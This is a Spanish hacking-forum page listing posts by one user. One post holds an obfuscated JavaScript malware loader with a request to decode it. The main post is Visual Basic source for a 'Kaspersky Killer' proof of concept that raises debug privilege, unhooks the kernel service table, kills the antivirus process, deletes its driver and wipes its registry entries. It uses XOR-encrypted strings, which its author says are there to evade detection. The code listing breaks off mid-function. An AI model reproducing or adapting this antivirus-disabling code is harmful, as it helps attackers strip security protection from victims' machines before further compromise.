elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Análisis y Diseño de Malware / Solicitud ayuda con JS en: 21 Junio 2015, 16:34 pm
buenos dias, hace mucho que no venia por elhacker.net. ,

solicito la ayuda de alguien en la medida de lo posible, quisiera saber si alguien ha descifrado algun malware de JS

Código:
b = [], Q = "", J = 3;

if (typeof prompt != "undefined") {
  var v = J++;
}
var v = v || Math, k = parseInt, i = "slice", z = "fromCharCode";

for (var Z = 0; Z < E.length;) b[~~(Z / 3)] = k(E[i](Z, Z += J), 23);
for (var X = 0; X < b.length; X += 2) Q += String[z](b[X] ^ b[X + 1]);var N = Math["floor"].constructor; N(Q)();

apenas comienzo con JS y me seria de mucha ayuda descifrar el code anteriror, me quedo varado en la ultima instrucción, en realidad no entiendo que hace
Código:
Math["floor"].constructor;

por lo que he consultado es una funcion matematica para manejo de numeros enteros, si alguien me podria colabrar quedo agradecido

XcryptOR
2  Programación / Programación Visual Basic / Bypass tiempo de espera de Megaupload en: 13 Julio 2009, 06:48 am
bueno me pareció interesante hacer esto en VB [Aunque es una lamerada]  aprovechando el  ‫javascript que se encarga de hacerlo, y como dice el titulo sirve para evitar el tiempo de espera para descargas de megaupload.  ;D

Source
3  Programación / Programación Visual Basic / [POC] Kaspersky Killer en: 13 Abril 2009, 19:55 pm
Bueno como no he tenido tiempo para depurar el code lo dejo a su dispocisión, espero les sirva como ejemplo




Modulo1:
Código
  1. '---------------------------------------------------------------------------------------
  2. ' Project     : KillKav [Kaspersky Killer]
  3. ' Date        : 19/03/2009 18:10
  4. ' Author      : XcryptOR
  5. ' Purpose     : Kill Kaspersky Antivirus, Delete Klif.sys Driver & Related Registry Entries
  6. ' Versions    : Kaspersky Antivirus 6,7,8, kaspersky 2009 y KIS 2009
  7. ' OS          : Windows XP Sp1, Sp2, Sp3. Vista(it needs some changes but works)
  8. ' Bugs        : When KLIM5.sys (Kaspersky NDIS Filter) Registry entry is delete the next reboot
  9. '               we can't access internet because the filter was not unistalled, the function
  10. '               Clean_TCPIP_Stack do the work, but i can't use when kill kaspersky only in the
  11. '               Next reboot, i believe that is not a problem to fix
  12. '               It can be improve very much it's only a POC
  13. ' Credits     : Iceboy, Syntax_err, and all the chinese Crew of vbgood
  14. '---------------------------------------------------------------------------------------
  15. Private Sub Main()
  16.    EnablePrivilege SE_DEBUG_PRIVILEGE, True
  17.    FindNtdllExport
  18.    GetSSDT
  19.    Fuck_KAV
  20.    KillRegs
  21.  
  22. End Sub
  23. Private Sub Fuck_KAV()
  24.    Dim hProcess        As Long
  25.    Dim Pid             As Long
  26.  
  27.    Pid = GetPIDByName(Crypt("¹®¨ö½ ½")) ' Get The PID By Name in this case AVP.exe
  28.  
  29.    hProcess = OpenProcess(PROCESS_ALL_ACCESS, False, Pid)
  30.    If hProcess = 0 Then
  31.            hProcess = LzOpenProcess(PROCESS_ALL_ACCESS, Pid)
  32.    End If
  33.  
  34.    Call MyTerminateProcess(hProcess, 0)
  35.  
  36.    ' strings are XOR crypted, to avoid some heuristics, the source is FUD: scan on NVT and virustotal
  37.    If DeleteDriver(Crypt("„ç焛ℱ¶¼·¯«„‹¡«¬½µëê„œª±®½ª«„“´±¾ö«¡«")) = True Then '\??\C:\Windows\System32\Drivers\Klif.sys
  38.            MsgBox Crypt("œª±®½ªø“´±¾ö«¡«ø´±µ±¶¹¼·ø ±¬·«¹µ½¶¬½") & vbCrLf & _
  39.                   Crypt("ùø“¹«¨½ª«³¡ø°¹ø«±¼·ø´±µ±¶¹¼·ø ±¬·«¹µ½¶¬½øy"), _
  40.                   vbExclamation, Crypt("“¹«¨½ª«³¡ø“±´´½ªøõø›·¼½¼øš¡ø€»ª¡¨¬·ª")
  41.    End If
  42. End Sub
  43.  

Modulo2:
Código
  1. Public Enum SYSTEM_INFORMATION_CLASS
  2.    SystemBasicInformation
  3.    SystemHandleInformation
  4. End Enum
  5.  
  6. Public Declare Function ZwQuerySystemInformation Lib "ntdll.dll" ( _
  7. ByVal SystemInformationClass As SYSTEM_INFORMATION_CLASS, _
  8. ByVal pSystemInformation As Long, _
  9. ByVal SystemInformationLength As Long, _
  10. ByRef ReturnLength As Long) As Long
  11.  
  12. Public Type SYSTEM_HANDLE_TABLE_ENTRY_INFO
  13.    UniqueProcessId         As Integer
  14.    CreatorBackTraceIndex   As Integer
  15.    ObjectTypeIndex         As Byte
  16.    HandleAttributes        As Byte
  17.    HandleValue             As Integer
  18.    pObject                 As Long
  19.    GrantedAccess           As Long
  20. End Type
  21.  
  22. Public Type SYSTEM_HANDLE_INFORMATION
  23.    NumberOfHandles         As Long
  24.    Handles(1 To 1)         As SYSTEM_HANDLE_TABLE_ENTRY_INFO
  25. End Type
  26.  
  27. Public Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004
  28. Public Const STATUS_ACCESS_DENIED = &HC0000022
  29.  
  30. Public Declare Function ZwWriteVirtualMemory Lib "ntdll.dll" ( _
  31. ByVal ProcessHandle As Long, _
  32. ByVal BaseAddress As Long, _
  33. ByVal pBuffer As Long, _
  34. ByVal NumberOfBytesToWrite As Long, _
  35. ByRef NumberOfBytesWritten As Long) As Long
  36.  
  37. Public Declare Function ZwOpenProcess Lib "ntdll.dll" ( _
  38. ByRef ProcessHandle As Long, _
  39. ByVal AccessMask As Long, _
  40. ByRef ObjectAttributes As OBJECT_ATTRIBUTES, _
  41. ByRef ClientId As CLIENT_ID) As Long
  42.  
  43. Public Type OBJECT_ATTRIBUTES
  44.    Length                  As Long
  45.    RootDirectory           As Long
  46.    ObjectName              As Long
  47.    Attributes              As Long
  48.    SecurityDescriptor      As Long
  49.    SecurityQualityOfService As Long
  50. End Type
  51.  
  52. Public Type CLIENT_ID
  53.    UniqueProcess           As Long
  54.    UniqueThread            As Long
  55. End Type
  56.  
  57. Public Const PROCESS_QUERY_INFORMATION      As Long = &H400
  58. Public Const STATUS_INVALID_CID             As Long = &HC000000B
  59.  
  60. Public Declare Function ZwClose Lib "ntdll.dll" ( _
  61. ByVal ObjectHandle As Long) As Long
  62.  
  63. Public Const ZwGetCurrentProcess            As Long = -1
  64. Public Const ZwGetCurrentThread             As Long = -2
  65. Public Const ZwCurrentProcess               As Long = ZwGetCurrentProcess
  66. Public Const ZwCurrentThread                As Long = ZwGetCurrentThread
  67.  
  68. Public Declare Function ZwCreateJobObject Lib "ntdll.dll" ( _
  69. ByRef JobHandle As Long, _
  70. ByVal DesiredAccess As Long, _
  71. ByRef ObjectAttributes As OBJECT_ATTRIBUTES) As Long
  72.  
  73. Public Declare Function ZwAssignProcessToJobObject Lib "ntdll.dll" ( _
  74. ByVal JobHandle As Long, _
  75. ByVal ProcessHandle As Long) As Long
  76.  
  77. Public Declare Function ZwTerminateJobObject Lib "ntdll.dll" ( _
  78. ByVal JobHandle As Long, _
  79. ByVal ExitStatus As Long) As Long
  80.  
  81. Public Const OBJ_INHERIT = &H2
  82. Public Const STANDARD_RIGHTS_REQUIRED       As Long = &HF0000
  83. Public Const SYNCHRONIZE                    As Long = &H100000
  84. Public Const JOB_OBJECT_ALL_ACCESS          As Long = STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &H1F
  85. Public Const PROCESS_DUP_HANDLE             As Long = &H40
  86. Public Const PROCESS_ALL_ACCESS             As Long = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)
  87. Public Const THREAD_ALL_ACCESS              As Long = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &H3FF)
  88. Public Const OB_TYPE_PROCESS                As Long = &H5
  89.  
  90. Public Type PROCESS_BASIC_INFORMATION
  91.    ExitStatus              As Long
  92.    PebBaseAddress          As Long
  93.    AffinityMask            As Long
  94.    BasePriority            As Long
  95.    UniqueProcessId         As Long
  96.    InheritedFromUniqueProcessId As Long
  97. End Type
  98.  
  99. Public Declare Function ZwDuplicateObject Lib "ntdll.dll" ( _
  100. ByVal SourceProcessHandle As Long, _
  101. ByVal SourceHandle As Long, _
  102. ByVal TargetProcessHandle As Long, _
  103. ByRef TargetHandle As Long, _
  104. ByVal DesiredAccess As Long, _
  105. ByVal HandleAttributes As Long, _
  106. ByVal Options As Long) As Long
  107.  
  108. Public Const DUPLICATE_CLOSE_SOURCE = &H1
  109. Public Const DUPLICATE_SAME_ACCESS = &H2
  110. Public Const DUPLICATE_SAME_ATTRIBUTES = &H4
  111.  
  112. Public Declare Function ZwQueryInformationProcess Lib "ntdll.dll" ( _
  113. ByVal ProcessHandle As Long, _
  114. ByVal ProcessInformationClass As PROCESSINFOCLASS, _
  115. ByVal ProcessInformation As Long, _
  116. ByVal ProcessInformationLength As Long, _
  117. ByRef ReturnLength As Long) As Long
  118.  
  119. Public Enum PROCESSINFOCLASS
  120.        ProcessBasicInformation
  121. End Enum
  122.  
  123. Public Const STATUS_SUCCESS                 As Long = &H0
  124. Public Const STATUS_INVALID_PARAMETER       As Long = &HC000000D
  125.  
  126. Public Declare Function ZwTerminateProcess Lib "ntdll.dll" ( _
  127. ByVal ProcessHandle As Long, _
  128. ByVal ExitStatus As Long) As Long
  129.  
  130. Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
  131.  
  132. Public Type SECURITY_ATTRIBUTES
  133.    nLength                 As Long
  134.    lpSecurityDescriptor    As Long
  135.    bInheritHandle          As Long
  136. End Type
  137.  
  138. Public Type a_my
  139.    name                    As String
  140.    Pid                     As Long
  141.    tid                     As Long
  142.    Handle                  As Long
  143. End Type
  144.  
  145. Public Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" ( _
  146. ByVal lpModuleName As String) As Long
  147.  
  148. Public Declare Function GetProcAddress Lib "kernel32" ( _
  149. ByVal hModule As Long, _
  150. ByVal lpProcName As String) As Long
  151.  
  152. Public Function NT_SUCCESS(ByVal Status As Long) As Boolean
  153.          NT_SUCCESS = (Status >= 0)
  154. End Function
  155.  
  156. Public Sub CopyMemory(ByVal Dest As Long, ByVal Src As Long, ByVal cch As Long)
  157. Dim Written As Long
  158.        Call ZwWriteVirtualMemory(ZwCurrentProcess, Dest, Src, cch, Written)
  159. End Sub
  160.  
  161. Public Function IsItemInArray(ByVal dwItem, ByRef dwArray() As Long) As Boolean
  162. Dim Index As Long
  163.        For Index = LBound(dwArray) To UBound(dwArray)
  164.                If (dwItem = dwArray(Index)) Then IsItemInArray = True: Exit Function
  165.        Next
  166.        IsItemInArray = False
  167. End Function
  168.  
  169. Public Sub AddItemToArray(ByVal dwItem As Long, ByRef dwArray() As Long)
  170. On Error GoTo ErrHdl
  171.  
  172.        If (IsItemInArray(dwItem, dwArray)) Then Exit Sub
  173.  
  174.        ReDim Preserve dwArray(UBound(dwArray) + 1)
  175.        dwArray(UBound(dwArray)) = dwItem
  176. ErrHdl:
  177.  
  178. End Sub
  179.  

Modulo3:
Código
  1. Private Declare Function SHDeleteKey Lib "shlwapi.dll" Alias "SHDeleteKeyA" ( _
  2. ByVal hKey As Long, _
  3. ByVal pszSubKey As String) As Long  ' Delete a key and subkeys from registry
  4.  
  5. Private Declare Function RegOpenKeyEx Lib "advapi32.dll" _
  6. Alias "RegOpenKeyExA" ( _
  7. ByVal hKey As Long, _
  8. ByVal lpSubKey As String, _
  9. ByVal ulOptions As Long, _
  10. ByVal samDesired As Long, _
  11. phkResult As Long) As Long
  12.  
  13. Private Declare Function RegCloseKey Lib "advapi32.dll" ( _
  14. ByVal hKey As Long) As Long
  15.  
  16. Private Declare Function RegDeleteValue Lib "advapi32.dll" _
  17. Alias "RegDeleteValueA" ( _
  18. ByVal hKey As Long, _
  19. ByVal lpValueName As String) As Long
  20.  
  21. Private Const REG_SZ                                As Long = 1
  22. Private Const REG_EXPAND_SZ                         As Long = 2
  23. Private Const REG_BINARY                            As Long = 3
  24. Private Const REG_DWORD                             As Long = 4
  25. Private Const REG_MULTI_SZ                          As Long = 7
  26.  
  27. Private Const KEY_QUERY_VALUE                       As Long = &H1
  28. Private Const KEY_ALL_ACCESS                        As Long = &H3F
  29. Private Const REG_OPTION_NON_VOLATILE               As Long = 0
  30.  
  31. Private Const HKEY_CLASSES_ROOT                     As Long = &H80000000
  32. Private Const HKEY_CURRENT_CONFIG                   As Long = &H80000005
  33. Private Const HKEY_CURRENT_USER                     As Long = &H80000001
  34. Private Const HKEY_DYN_DATA                         As Long = &H80000006
  35. Private Const HKEY_LOCAL_MACHINE                    As Long = &H80000002
  36. Private Const HKEY_PERFORMANCE_DATA                 As Long = &H80000004
  37. Private Const HKEY_USERS                            As Long = &H80000003
  38. Private Declare Function ZwDeleteFile Lib "ntdll.dll" ( _
  39. ByRef ObjectAttributes As OBJECT_ATTRIBUTES) As Long
  40.  
  41. Private Declare Sub RtlInitUnicodeString Lib "ntdll.dll" ( _
  42. ByVal DestinationString As Long, _
  43. ByVal SourceString As Long)
  44.  
  45. Private Type UNICODE_STRING
  46.        Length              As Integer
  47.        MaximumLength       As Integer
  48.        Buffer              As String
  49. End Type
  50.  
  51. Private Type OBJECT_ATTRIBUTES
  52.        Length                      As Long
  53.        RootDirectory               As Long
  54.        ObjectName                  As Long
  55.        Attributes                  As Long
  56.        SecurityDescriptor          As Long
  57.        SecurityQualityOfService    As Long
  58. End Type
  59.  
  60. Private Const OBJ_CASE_INSENSITIVE          As Long = &H40
  61.  
  62. Public Const SE_SHUTDOWN_PRIVILEGE          As Long = 19
  63. Public Const SE_DEBUG_PRIVILEGE             As Long = 20
  64.  
  65. Private Const STATUS_NO_TOKEN               As Long = &HC000007C
  66.  
  67. Private Declare Function RtlAdjustPrivilege Lib "ntdll.dll" ( _
  68. ByVal Privilege As Long, _
  69. ByVal Enable As Boolean, _
  70. ByVal Client As Boolean, _
  71. WasEnabled As Long) As Long
  72.  
  73. Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" ( _
  74. ByVal lFlags As Long, _
  75. ByVal lProcessID As Long) As Long
  76. '---
  77. Private Declare Function Process32First Lib "kernel32" ( _
  78. ByVal hSnapShot As Long, _
  79. uProcess As PROCESSENTRY32) As Long
  80. '---
  81. Private Declare Function Process32Next Lib "kernel32" ( _
  82. ByVal hSnapShot As Long, _
  83. uProcess As PROCESSENTRY32) As Long
  84. '---
  85. Private Const TH32CS_SNAPHEAPLIST           As Long = &H1
  86. Private Const TH32CS_SNAPPROCESS            As Long = &H2
  87. Private Const TH32CS_SNAPTHREAD             As Long = &H4
  88. Private Const TH32CS_SNAPMODULE             As Long = &H8
  89. Private Const TH32CS_SNAPALL                As Long = (TH32CS_SNAPHEAPLIST Or TH32CS_SNAPPROCESS Or TH32CS_SNAPTHREAD Or TH32CS_SNAPMODULE)
  90. Private Const MAX_PATH                      As Long = 260
  91.  
  92. Private Type PROCESSENTRY32
  93.        dwSize              As Long
  94.        cntUsage            As Long
  95.        th32ProcessID       As Long
  96.        th32DefaultHeapID   As Long
  97.        th32ModuleID        As Long
  98.        cntThreads          As Long
  99.        th32ParentProcessID As Long
  100.        pcPriClassBase      As Long
  101.        dwFlags             As Long
  102.        szExeFile           As String * MAX_PATH
  103. End Type
  104.  
  105. Public Declare Function WinExec Lib "kernel32" ( _
  106. ByVal lpCmdLine As String, _
  107. ByVal nCmdShow As Long) As Long
  108.  
  109. Public Const SW_HIDE = 0
  110.  
  111. '========================================================================================
  112. '================================ Get ID Process By Name ================================
  113. '========================================================================================
  114. Public Function GetPIDByName(ByVal PName As String) As Long
  115.    Dim hSnapShot       As Long
  116.    Dim uProcess        As PROCESSENTRY32
  117.    Dim t               As Long
  118.    hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&)
  119.    uProcess.dwSize = Len(uProcess)
  120.    PName = LCase(PName)
  121.    t = Process32First(hSnapShot, uProcess)
  122.    Do While t
  123.        t = InStr(1, uProcess.szExeFile, Chr(0))
  124.        If LCase(Left(uProcess.szExeFile, t - 1)) = PName Then
  125.            GetPIDByName = uProcess.th32ProcessID
  126.            Exit Function
  127.        End If
  128.        t = Process32Next(hSnapShot, uProcess)
  129.    Loop
  130. End Function
  131.  
  132. '========================================================================================
  133. '==================================== Get Privileges ====================================
  134. '========================================================================================
  135. Public Function EnablePrivilege(ByVal Privilege As Long, Enable As Boolean) As Boolean
  136.    Dim ntStatus        As Long
  137.    Dim WasEnabled      As Long
  138.    ntStatus = RtlAdjustPrivilege(Privilege, Enable, True, WasEnabled)
  139.    If ntStatus = STATUS_NO_TOKEN Then
  140.        ntStatus = RtlAdjustPrivilege(Privilege, Enable, False, WasEnabled)
  141.    End If
  142.    If ntStatus = 0 Then
  143.        EnablePrivilege = True
  144.    Else
  145.        EnablePrivilege = False
  146.    End If
  147. End Function
  148.  
  149. '========================================================================================
  150. '============================= Simple XOR String Encryption =============================
  151. '========================================================================================
  152. Public Function Crypt(txt As String) As String
  153.    On Error Resume Next
  154.    Dim x       As Long
  155.    Dim PF      As String
  156.    Dim PG      As String
  157.  
  158.    For x = 1 To Len(txt)
  159.        PF = Mid(txt, x, 1)
  160.        PG = Asc(PF)
  161.        Crypt = Crypt & Chr(PG Xor (216 Mod 255))
  162.    Next
  163. End Function
  164.  
  165. '========================================================================================
  166. '====================== Initialize Object Attributes Structure ==========================
  167. '========================================================================================
  168. Private Sub InicializarOA(ByRef InitializedAttributes As OBJECT_ATTRIBUTES, _
  169.                          ByRef ObjectName As UNICODE_STRING, _
  170.                          ByVal Attributes As Long, _
  171.                          ByVal RootDirectory As Long, _
  172.                          ByVal SecurityDescriptor As Long) 'inicializa las propiedades de OBJECT_ATTRIBUTES
  173.        With InitializedAttributes
  174.                .Length = LenB(InitializedAttributes)
  175.                .Attributes = Attributes
  176.                .ObjectName = VarPtr(ObjectName)
  177.                .RootDirectory = RootDirectory
  178.                .SecurityDescriptor = SecurityDescriptor
  179.                .SecurityQualityOfService = 0
  180.        End With
  181. End Sub
  182.  
  183. '========================================================================================
  184. '=============================== Delete KLIF.sys Driver =================================
  185. '========================================================================================
  186. Public Function DeleteDriver(StrDriverPath As String) As Boolean
  187. On Error Resume Next
  188.    Dim OA          As OBJECT_ATTRIBUTES
  189.    Dim UStrPath    As UNICODE_STRING
  190.    RtlInitUnicodeString ByVal VarPtr(UStrPath), StrPtr(StrDriverPath) ' Path debe estar en formato de para APIs Nativas "\??\C:\Windows\System32\Drivers\Klif.sys"
  191.    InicializarOA OA, UStrPath, OBJ_CASE_INSENSITIVE, 0, 0
  192.  
  193.    If NT_SUCCESS(ZwDeleteFile(OA)) Then
  194.        DeleteDriver = True
  195.    End If
  196. End Function
  197.  
  198. '===================================================================================
  199. '================== Delete Registry Entries of all Kasper Services =================
  200. '===================================================================================
  201. Public Sub KillRegs()
  202.    DeleteAllKeys GetHKEY(3), Crypt("‹‹Œ•„›­ªª½¶¬›·¶¬ª·´‹½¬„‹½ª®±»½«„™Žˆ")              '"SYSTEM\CurrentControlSet\Services\AVP"
  203.    DeleteAllKeys GetHKEY(3), Crypt("‹‹Œ•„›­ªª½¶¬›·¶¬ª·´‹½¬„‹½ª®±»½«„³´é")              '"SYSTEM\CurrentControlSet\Services\kl1"
  204.    DeleteAllKeys GetHKEY(3), Crypt("‹‹Œ•„›­ªª½¶¬›·¶¬ª·´‹½¬„‹½ª®±»½«„“”‘ž")             '"SYSTEM\CurrentControlSet\Services\KLIF"
  205.    DeleteAllKeys GetHKEY(3), Crypt("‹‹Œ•„›­ªª½¶¬›·¶¬ª·´‹½¬„‹½ª®±»½«„³´±µí")            '"SYSTEM\CurrentControlSet\Services\klim5"
  206.    DeleteAllKeys GetHKEY(3), Crypt("‹·¾¬¯¹ª½„“¹«¨½ª«³¡”¹º")                              '"Software\KasperskyLab"
  207.    DeleteAllKeys GetHKEY(1), Crypt("›”‹‘œ„£¼¼êëèààèõìáí¹õéé¼éõºèîìõèèàèìཻ꾻í¥")       '"CLSID\{dd230880-495a-11d1-b064-008048ec2fc5}" : Remove from Context Menu
  208.    DeleteKey Crypt("‹·¾¬¯¹ª½„•±»ª·«·¾¬„±¶¼·¯«„›­ªª½¶¬Ž½ª«±·¶„Š­¶"), Crypt("¹®¨"), 3     '"Software\Microsoft\Windows\CurrentVersion\Run", "avp"
  209. End Sub
  210.  
  211. '===================================================================================
  212. '========================= Eliminar el valor del Registro ==========================
  213. '===================================================================================
  214. Public Sub DeleteKey(sKey, nKey, RegKey)
  215.    On Error Resume Next
  216.    Dim RK          As Long
  217.    Dim l           As Long
  218.    Dim hKey        As Long
  219.    l = RegOpenKeyEx(GetHKEY(RegKey), sKey, 0, KEY_ALL_ACCESS, hKey)
  220.    l = RegDeleteValue(hKey, nKey)
  221.    l = RegCloseKey(hKey)
  222. End Sub
  223.  
  224. '===================================================================================
  225. '===================== Delete Keys and Subkeys from Registry =======================
  226. '===================================================================================
  227. Private Sub DeleteAllKeys(hKey As String, key As String)
  228.    Dim lResult As Long
  229.    lResult = SHDeleteKey(hKey, key)
  230. End Sub
  231.  
  232. Private Function GetHKEY(RegKey)
  233.    On Error Resume Next
  234.    Select Case RegKey
  235.        Case 1
  236.        GetHKEY = HKEY_CLASSES_ROOT
  237.        Case 2
  238.        GetHKEY = HKEY_CURRENT_USER
  239.        Case 3
  240.        GetHKEY = HKEY_LOCAL_MACHINE
  241.    End Select
  242. End Function
  243.  
  244. '===================================================================================
  245. '=================== Clean TCP/IP to unistall Klim5.sys NDIS =======================
  246. '===================================================================================
  247. Public Sub Clean_TCPIP_Stack()
  248. WinExec "netsh int ip reset", SW_HIDE
  249. DoEvents
  250. WinExec "netsh winsock reset", SW_HIDE
  251. End Sub
  252.  
  253.  


Modulo4:

Modulo4:
Código
  1. ' -----------------------------------------------------------------------------------
  2. ' Module        : mSSDTUnhook
  3. ' Author        : Iceboy
  4. ' Purpose       : Unhook APIs i used this great work of Iceboy to unhook Apis from Kaspersky
  5. ' -----------------------------------------------------------------------------------
  6. Option Explicit
  7.  
  8. Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" ( _
  9. ByVal lpLibFileName As String) As Long
  10.  
  11. Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" ( _
  12. ByVal pDst As Long, _
  13. ByVal pSrc As Long, _
  14. ByVal ByteLen As Long)
  15.  
  16. Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" ( _
  17. ByVal lpString As Long) As Long
  18.  
  19. Private Declare Function LoadLibraryEx Lib "kernel32" Alias "LoadLibraryExA" ( _
  20. ByVal lpLibFileName As Long, _
  21. ByVal hFile As Long, _
  22. ByVal dwFlags As Long) As Long
  23.  
  24. Private Declare Function FreeLibrary Lib "kernel32" ( _
  25. ByVal hLibModule As Long) As Long
  26.  
  27. Private Declare Function GetProcAddress Lib "kernel32" ( _
  28. ByVal hModule As Long, _
  29. ByVal lpProcName As String) As Long
  30.  
  31. Private Declare Function ZwQuerySystemInformation Lib "ntdll.dll" ( _
  32. ByVal SystemInformationClass As SYSTEM_INFORMATION_CLASS, _
  33. ByVal pSystemInformation As Long, _
  34. ByVal SystemInformationLength As Long, _
  35. ByVal pReturnLength As Long) As Long
  36.  
  37. Private Declare Function ZwSystemDebugControl Lib "ntdll.dll" ( _
  38. ByVal ControlCode As SYSDBG_COMMAND, _
  39. ByVal pInputBuffer As Long, _
  40. ByVal InputBufferLength As Long, _
  41. ByVal pOutputBuffer As Long, _
  42. ByVal OutputBufferLength As Long, _
  43. ByVal pReturnLength As Long) As Long
  44.  
  45. Public Enum SYSDBG_COMMAND
  46.    SysDbgReadVirtualMemory = 8
  47.    SysDbgWriteVirtualMemory = 9
  48. End Enum
  49.  
  50. Private Enum SYSTEM_INFORMATION_CLASS
  51.    SystemModuleInformation = 11
  52. End Enum
  53.  
  54. Private Type IMAGE_DOS_HEADER
  55.    e_magic                 As Integer
  56.    Unused(0 To 57)         As Byte
  57.    e_lfanew                As Long
  58. End Type
  59.  
  60. Private Type IMAGE_NT_HEADER
  61.    Signature               As Long
  62.    Unused1(0 To 15)        As Byte
  63.    SizeOfOptionalHeader    As Integer
  64.    Characteristics         As Integer
  65.    Magic                   As Integer
  66.    Unused3(0 To 25)        As Byte
  67.    ImageBase               As Long
  68.    Unused4(0 To 23)        As Byte
  69.    SizeOfImage             As Long
  70.    Unused5(0 To 31)        As Byte
  71.    NumberOfRvaAndSizes     As Long
  72.    ExportTableRva          As Long
  73.    ExportTableSize         As Long
  74.    Unused6(0 To 31)        As Byte
  75.    RelocationTableRva      As Long
  76.    RelocationTableSize     As Long
  77. End Type
  78.  
  79. Private Type IMAGE_EXPORT_DIRECTORY
  80.    Unused(0 To 11)         As Byte
  81.    name                    As Long
  82.    Base                    As Long
  83.    NumberOfFunctions       As Long
  84.    NumberOfNames           As Long
  85.    AddressOfFunctions      As Long
  86.    AddressOfNames          As Long
  87.    AddressOfOrdinals       As Long
  88. End Type
  89.  
  90. Private Type IMAGE_BASE_RELOCATION
  91.    VirtualAddress          As Long
  92.    SizeOfBlock             As Long
  93. End Type
  94.  
  95. Private Type IMAGE_FIXED_ENTRY
  96.    Offset                  As Long
  97.    Type                    As Long
  98. End Type
  99.  
  100. Private Type ModuleInformation
  101.    Reserved(7)             As Byte
  102.    Base                    As Long
  103.    Size                    As Long
  104.    Flags                   As Long
  105.    Index                   As Integer
  106.    Unknown                 As Integer
  107.    Loadcount               As Integer
  108.    ModuleNameOffset        As Integer
  109.    ImageName(250)          As long
  110. End Type
  111.  
  112. Private Type MEMORY_CHUNKS
  113.    Address                 As Long
  114.    pData                   As Long
  115.    Length                  As Long
  116. End Type
  117.  
  118. Private Const DONT_RESOLVE_DLL_REFERENCES   As Long = 1
  119. Private Const IMAGE_REL_BASED_HIGHLOW       As Long = 3
  120. Private Const IMAGE_FILE_RELOCS_STRIPPED    As Integer = 1
  121.  
  122. Dim FuncName(1023)                          As String
  123. Dim Address1(1023)                          As Long
  124. Dim Address2(1023)                          As Long
  125. Dim ModuleName(1023)                        As String
  126.  
  127. Dim dwServices                              As Long
  128. Dim dwKernelBase                            As Long
  129. Dim dwKiServiceTable                        As Long
  130.  
  131. Public Sub RecoverSSDT(ByVal num As Long)
  132.    Address2(num) = Address1(num)
  133. End Sub
  134.  
  135. Public Sub WriteSSDT()
  136.    Dim QueryBuff As MEMORY_CHUNKS, ReturnLength As Long
  137.    With QueryBuff
  138.        .Address = dwKiServiceTable + dwKernelBase
  139.        .pData = VarPtr(Address2(0))
  140.        .Length = dwServices * 4
  141.        ZwSystemDebugControl SysDbgWriteVirtualMemory, VarPtr(QueryBuff), 12, 0, 0, VarPtr(ReturnLength)
  142.        If ReturnLength <> .Length Then MsgBox "SSDT Cannot Write", vbCritical
  143.    End With
  144. End Sub
  145.  
  146. Private Function ModuleInformationFromPtr(ByVal pmi As Long) As ModuleInformation
  147.    CopyMemory VarPtr(ModuleInformationFromPtr), pmi, 284
  148. End Function
  149.  
  150. Private Function BaseRelocationFromPtr(ByVal pbr As Long) As IMAGE_BASE_RELOCATION
  151.    CopyMemory VarPtr(BaseRelocationFromPtr), pbr, 8
  152. End Function
  153.  
  154. Private Function FixedEntryFromPtr(ByVal pfe As Long) As IMAGE_FIXED_ENTRY
  155.    Dim tmp As Integer
  156.    CopyMemory VarPtr(tmp), pfe, 2
  157.    FixedEntryFromPtr.Offset = tmp And 4095
  158.    CopyMemory VarPtr(tmp), pfe + 1, 1
  159.    FixedEntryFromPtr.Type = (tmp And 240) \ 16
  160. End Function
  161.  
  162. Private Function DwordFromPtr(ByVal pdword As Long) As Long
  163.    CopyMemory VarPtr(DwordFromPtr), pdword, 4
  164. End Function
  165.  
  166. Private Function WordFromPtr(ByVal pword As Long) As Long
  167.    CopyMemory VarPtr(WordFromPtr), pword, 2
  168. End Function
  169.  
  170. Private Function FindKiServiceTable(ByVal hModule As Long, ByVal dwKSDT As Long) As Long
  171.    Dim DosHeader As IMAGE_DOS_HEADER, NtHeader As IMAGE_NT_HEADER
  172.    Dim pbr As Long, pfe As Long, bFirstChunk As Boolean, I As Long, forto As Long
  173.    Dim dwFixups As Long, dwPointerRva As Long, dwPointsToRva As Long
  174.    CopyMemory VarPtr(DosHeader), hModule, 64
  175.    With DosHeader
  176.        Assert .e_magic = &H5A4D
  177.        CopyMemory VarPtr(NtHeader), hModule + .e_lfanew, 168
  178.    End With
  179.    bFirstChunk = True
  180.    Do While bFirstChunk Or CBool(BaseRelocationFromPtr(pbr).VirtualAddress)
  181.        bFirstChunk = False
  182.        pfe = pbr + 8
  183.        forto = (BaseRelocationFromPtr(pbr).SizeOfBlock - 8) \ 2 - 1
  184.        For I = 0 To forto
  185.            If FixedEntryFromPtr(pfe).Type = IMAGE_REL_BASED_HIGHLOW Then
  186.                dwFixups = dwFixups + 1
  187.                dwPointerRva = BaseRelocationFromPtr(pbr).VirtualAddress + FixedEntryFromPtr(pfe).Offset
  188.                dwPointsToRva = DwordFromPtr(hModule + dwPointerRva) - NtHeader.ImageBase
  189.                If dwPointsToRva = dwKSDT Then
  190.                    If WordFromPtr(hModule + dwPointerRva - 2) = &H5C7 Then
  191.                        FindKiServiceTable = DwordFromPtr(hModule + dwPointerRva + 4) - NtHeader.ImageBase
  192.                        Exit Function
  193.                    End If
  194.                End If
  195.            End If
  196.            pfe = pfe + 2
  197.        Next
  198.        pbr = pbr + BaseRelocationFromPtr(pbr).SizeOfBlock
  199.    Loop
  200. End Function
  201.  
  202. Private Function AddZero(ByVal Text As String, ByVal Length As Long) As String
  203.    AddZero = String(Length - Len(Text), "0") & Text
  204. End Function
  205.  
  206. Public Sub GetSSDT()
  207. On Error Resume Next
